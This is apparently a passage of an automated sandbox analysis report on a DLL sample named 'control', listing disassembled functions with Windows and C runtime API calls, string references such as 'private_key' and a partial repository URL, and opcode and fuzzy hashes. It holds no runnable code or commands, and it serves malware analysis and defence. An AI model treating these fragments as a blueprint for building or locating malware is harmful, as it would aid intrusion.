__dosmaperr.LIBCMT ref: 10036916

Part of subcall function 10037F1F: __getptd_noexit.LIBCMT ref: 10037F1F

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 0aa5bc5dc75a9b31d5b1c3d2b4f669a46dcce3f01b27eb34bd993268152f2fdf
Instruction ID: 5cb67746c8deb3b6908984522394d369b9fd44db8d44f232a0760157a2382a7a
Opcode Fuzzy Hash: 0aa5bc5dc75a9b31d5b1c3d2b4f669a46dcce3f01b27eb34bd993268152f2fdf
Instruction Fuzzy Hash: D211C836204706AFE712DFA5DC41E9B3BD8EF496A6F21452AF918CE152EF31E8118760

Function 1001B9CF Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001B9D4

Part of subcall function 10015FD9: char_traits.LIBCPMT ref: 10015FF2

LocalAlloc.KERNEL32(00000040,?,1005D658,?,00000000,00000000,?,00000000,00000000), ref: 1001BA16
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA35
char_traits.LIBCPMT ref: 1001BA3C
LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA4C

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Localchar_traits$AllocByteCharFreeH_prologMultiWide
String ID:
API String ID: 3955896064-0
Opcode ID: 07706e345a344bd4d6aac4436143f3a5e68c24b416f2c0d5e3bd243b5069f4fd
Instruction ID: 4a6ce25186c6130df069cdcea66e34867a326c7206a802e54ae00b1d56e6594d
Opcode Fuzzy Hash: 07706e345a344bd4d6aac4436143f3a5e68c24b416f2c0d5e3bd243b5069f4fd
Instruction Fuzzy Hash: 9211EDB1A00314AFEB10DFA99C95B6FBBB8FF44350F50052AF606E7281CB70DE448A61

Function 100174CD Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100174D2
std::_Lockit::_Lockit.LIBCPMT ref: 100174E4

Part of subcall function 10032521: __lock.LIBCMT ref: 10032532

std::exception::exception.LIBCMT ref: 1001752B

Part of subcall function 10035843: std::exception::_Copy_str.LIBCMT ref: 1003585C

__CxxThrowException@8.LIBCMT ref: 10017540

Part of subcall function 100374AB: RaiseException.KERNEL32(?,?,100324BA,?,?,?,?,?,100324BA,?,1005F454,100065DE), ref: 100374FC

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 10017549

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__lockstd::exception::_std::exception::exception
String ID:
API String ID: 3430881366-0
Opcode ID: d6a2380a438230f467dc9b6f5abf8cdf1449d0574d5a5743862a8377094055bd
Instruction ID: 2e25aa19e792d692cfb8a749acde735e181f8864b27ee24d0f24afe00c039543
Opcode Fuzzy Hash: d6a2380a438230f467dc9b6f5abf8cdf1449d0574d5a5743862a8377094055bd
Instruction Fuzzy Hash: 4C115EB5801B84DEC721CFA9C48058FFBF4FF18240B90892FE49AD3A01D734A649CBA5

Function 1001C0C6 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 1001C0CD

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

_rand.LIBCMT ref: 1001C0DF
_rand.LIBCMT ref: 1001C0F0
_rand.LIBCMT ref: 1001C100
_rand.LIBCMT ref: 1001C10D

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _rand$Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2467205089-0
Opcode ID: 85291bb48af480fafd9442eab0fdbe79dcb2487f13a4d34283cf0040ea608ccf
Instruction ID: 498d4cc3d495996ae9654b980ead4bc9d5abdff1964c0139d70e9de98c3e814c
Opcode Fuzzy Hash: 85291bb48af480fafd9442eab0fdbe79dcb2487f13a4d34283cf0040ea608ccf
Instruction Fuzzy Hash: 57F0B46F7C530428E112A1B66883F9B5386C7922B2F62442AFA005D0834CEBFC971171

Function 10043487 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC

__amsg_exit.LIBCMT ref: 100434B4
__lock.LIBCMT ref: 100434C4
InterlockedDecrement.KERNEL32(?), ref: 100434E1
_free.LIBCMT ref: 100434F4
InterlockedIncrement.KERNEL32(02E79C38), ref: 1004350C

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 1231874560-0
Opcode ID: 30783ecee63b859ae03d249e61e977a37b21bf0c85f4d24dd4a4fcbf5da3e8a6
Instruction ID: 1a676bcf710e47d28fb425a3ba0c93491637c3a6279d9b895e8767c0b2df3840
Opcode Fuzzy Hash: 30783ecee63b859ae03d249e61e977a37b21bf0c85f4d24dd4a4fcbf5da3e8a6
Instruction Fuzzy Hash: 4B01C835901B21DBEB12DB618842B8DB3A0FF44772F25A125E805EB6D1CB747940CBD5

Function 10029180 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 10029187

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

_rand.LIBCMT ref: 100291A0
_rand.LIBCMT ref: 100291B3
_rand.LIBCMT ref: 100291C5
_rand.LIBCMT ref: 100291D2

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _rand$Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2467205089-0
Opcode ID: c968f277d0f78b788435681ff016cffce340b1874899cb01f81134d615aae11b
Instruction ID: 49897373e2c5e09ab42bbc18d07cd4d3912f03337949244e259c9962823e8d3a
Opcode Fuzzy Hash: c968f277d0f78b788435681ff016cffce340b1874899cb01f81134d615aae11b
Instruction Fuzzy Hash: E0F0507E7853024AD311D16268C6BD72387CBD2392FD10429BE055D043CC9F7C2B6176

Function 1001C58E Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 279COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001C593

Part of subcall function 1001C50D: __EH_prolog.LIBCMT ref: 1001C512

Part of subcall function 1001C492: __EH_prolog.LIBCMT ref: 1001C497

Strings

@, xrefs: 1001C6E3
e/jsonAPP/raw/master/rai, xrefs: 1001C858, 1001C7C9, 1001C744, 1001C6BD, 1001C874, 1001C880
djsonapi.cpp, xrefs: 1001C878

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: @$djsonapi.cpp$e/jsonAPP/raw/master/rai
API String ID: 3519838083-2556513634
Opcode ID: da7ad3d737f3b97ad4cbae45dbeedb0bf1bde31c9bd59e9c61a6615254f2a7dc
Instruction ID: e35286a00a694312397edf4dac3263dee23b3cda9c5dec8b5405504b628cfc74
Opcode Fuzzy Hash: da7ad3d737f3b97ad4cbae45dbeedb0bf1bde31c9bd59e9c61a6615254f2a7dc
Instruction Fuzzy Hash: EAB17D7590538DDEEB01CFE8C8A1BEDBBB4EF56340F244059D545AB283E734AA4ACB50

Function 10012949 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001294E

Part of subcall function 10008F12: __EH_prolog.LIBCMT ref: 10008F17

_free.LIBCMT ref: 10012B54
_free.LIBCMT ref: 10012B69

Strings

123, xrefs: 10012A9C

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog_free
String ID: 123
API String ID: 271808718-2286445522
Opcode ID: 3531562bc7174fe7f0065638616dd3700cce6067d64214d7c1095c229802346a
Instruction ID: ff623e6fd29356da03f94aa7efefbc839a7b4de60313e6bc85451b60669c9f62
Opcode Fuzzy Hash: 3531562bc7174fe7f0065638616dd3700cce6067d64214d7c1095c229802346a
Instruction Fuzzy Hash: CC616975900209AFDB15CFA4C885BEEF7B5FF14340F10426EE00AA7156DB70AE89CBA0

Function 10014268 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 154COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001426D

Strings

res, xrefs: 100142D1, 100142D6, 100142F1
data, xrefs: 100143C4, 100143DF
msg, xrefs: 10014323, 10014328, 1001433F

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: data$msg$res
API String ID: 3519838083-3980117613
Opcode ID: 639c7fa742343cc957440622c82f50c4dc46beb9c5a8af481b02dc0626dc696f
Instruction ID: ca96f964450022b4ce825e2093a35d337ed43a8c942eac252b94f1a881985688
Opcode Fuzzy Hash: 639c7fa742343cc957440622c82f50c4dc46beb9c5a8af481b02dc0626dc696f
Instruction Fuzzy Hash: 36519035800259DFDB01CFA4C891BEEB7B4EF15394F128169E81A7B191EB70BA88CB50

Function 10008570 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10008575

Strings

start, xrefs: 10008688, 100086A3
plug_id, xrefs: 10008632, 1000864D
device, xrefs: 100085D6, 100085DB, 100085F6

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: device$plug_id$start
API String ID: 3519838083-2830589257
Opcode ID: e44a6e828e21c30134f211eeb5f4d4cf6651ae1a0eb397ebc608cd26752bb1b4
Instruction ID: 61eb8341c66f9c1c37179d96dec97e96f165e86e955c115b352dda1f94a7ecc4
Opcode Fuzzy Hash: e44a6e828e21c30134f211eeb5f4d4cf6651ae1a0eb397ebc608cd26752bb1b4
Instruction Fuzzy Hash: DA415176900169DFEB01CF94C861AEE73B4FF15390F064129ED86A7159DB74BE44CB90

Function 1001320B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10013210

Strings

private_key, xrefs: 100132BA, 100132D5
res, xrefs: 10013271, 10013276, 10013291
uid, xrefs: 1001330F, 1001332A

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: private_key$res$uid
API String ID: 3519838083-3738858810
Opcode ID: cd588a721d36235ec090437caf60968450bd490db07ae58f426048e61703a1e6
Instruction ID: 0cf17efe025f2ff022da59414d9263fdb3e23aa0c70f559fd6cd2d39d45429a1
Opcode Fuzzy Hash: cd588a721d36235ec090437caf60968450bd490db07ae58f426048e61703a1e6
Instruction Fuzzy Hash: C0419D76800568EFDB01CFD9C851AEEB3B4FF05390F018129E856AB145EB70BE88CB90

Function 1000841A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000841F
_sprintf.LIBCMT ref: 10008523

Strings

version, xrefs: 100084DA, 100084DF, 100084F6
device, xrefs: 10008480, 10008485, 100084A0

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog_sprintf
String ID: device$version
API String ID: 1907722333-3297806232
Opcode ID: c444afb1065a848e864711c5baf8a15f5b3e0c74e49889477f4c9a2eee4a49fc
Instruction ID: f25d236ea6f9278581fcfa21b551091c7206b5ca2dc78d628d144162d2d67334
Opcode Fuzzy Hash: c444afb1065a848e864711c5baf8a15f5b3e0c74e49889477f4c9a2eee4a49fc
Instruction Fuzzy Hash: 6341737680015DAFEB01CFE4C851AEE77B8FF05390F114129E945A7145D774AB88CB90

Function 1000316E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 100031D7
_memmove.LIBCMT ref: 10003202
_memmove.LIBCMT ref: 10003224

Strings

string too long, xrefs: 1000324B

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: string too long
API String ID: 4104443479-2556327735
Opcode ID: da4230c6e38f331946945dc2367437a744eab73af8de7dbe5edd4ac9c8566102
Instruction ID: fa3cd2dc3d769f6888f7928de3acb5536cb6e3c99d1e7fc2bdd3fd91821b90be
Opcode Fuzzy Hash: da4230c6e38f331946945dc2367437a744eab73af8de7dbe5edd4ac9c8566102
Instruction Fuzzy Hash: 66317131700700DBEB36DE58D844957B7BEEB45680B10891DE8A28B28AD771E945CB91

Function 10012342 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10012347

Part of subcall function 10008F12: __EH_prolog.LIBCMT ref: 10008F17

_free.LIBCMT ref: 10012421
_free.LIBCMT ref: 10012433

Strings

device, xrefs: 100123AE, 100123C1, 100123C2

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog_free
String ID: device
API String ID: 271808718-154121870
Opcode ID: ae67f1c37a1b86e07fb64e567300a05cac03445ac227f2bae7b17e01d95922c8
Instruction ID: 8b352d68cf92191ed834dfb9f3932a70d875671965cf77d54b86c3eaa2099a4a
Opcode Fuzzy Hash: ae67f1c37a1b86e07fb64e567300a05cac03445ac227f2bae7b17e01d95922c8
Instruction Fuzzy Hash: 5C3159B5900258EEEB05DFA4C845BEDFBB8FF55340F50406AE0466B296DBB42F84CB60

Function 1001246D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10012472

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

Part of subcall function 10008F12: __EH_prolog.LIBCMT ref: 10008F17

_free.LIBCMT ref: 10012546
_free.LIBCMT ref: 10012558

Strings

sid, xrefs: 100124D3, 100124E6, 100124E7

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog$_free
String ID: sid
API String ID: 2563830877-1461090996
Opcode ID: 45b1833436aebd115a9bf67bcfa3deefc2aff0bcee86cf1d7ed434a2520843f3
Instruction ID: 9d7c95b8395188239dba035838d6e92d8085a0d8a7789bfa883ebda44ad11a6c
Opcode Fuzzy Hash: 45b1833436aebd115a9bf67bcfa3deefc2aff0bcee86cf1d7ed434a2520843f3
Instruction Fuzzy Hash: A93148B5D0025CEEEB05DBA4C845BEDBBB8FF55340F10406AE04667292DBB46E84CB60

Function 10012234 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10012239

Part of subcall function 10008F12: __EH_prolog.LIBCMT ref: 10008F17

_free.LIBCMT ref: 100122FF
_free.LIBCMT ref: 10012311

Strings

uuid, xrefs: 1001228C, 1001229F, 100122A0

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog_free
String ID: uuid
API String ID: 271808718-3514781862
Opcode ID: 5a70fb0f833a824bb207220769a3dc39f7570e53704effb895e07f21439dd7dd
Instruction ID: 60ed96529ef6cf83be549339f636282f4e59d17fc7a14b59ad06169e53b769f5
Opcode Fuzzy Hash: 5a70fb0f833a824bb207220769a3dc39f7570e53704effb895e07f21439dd7dd
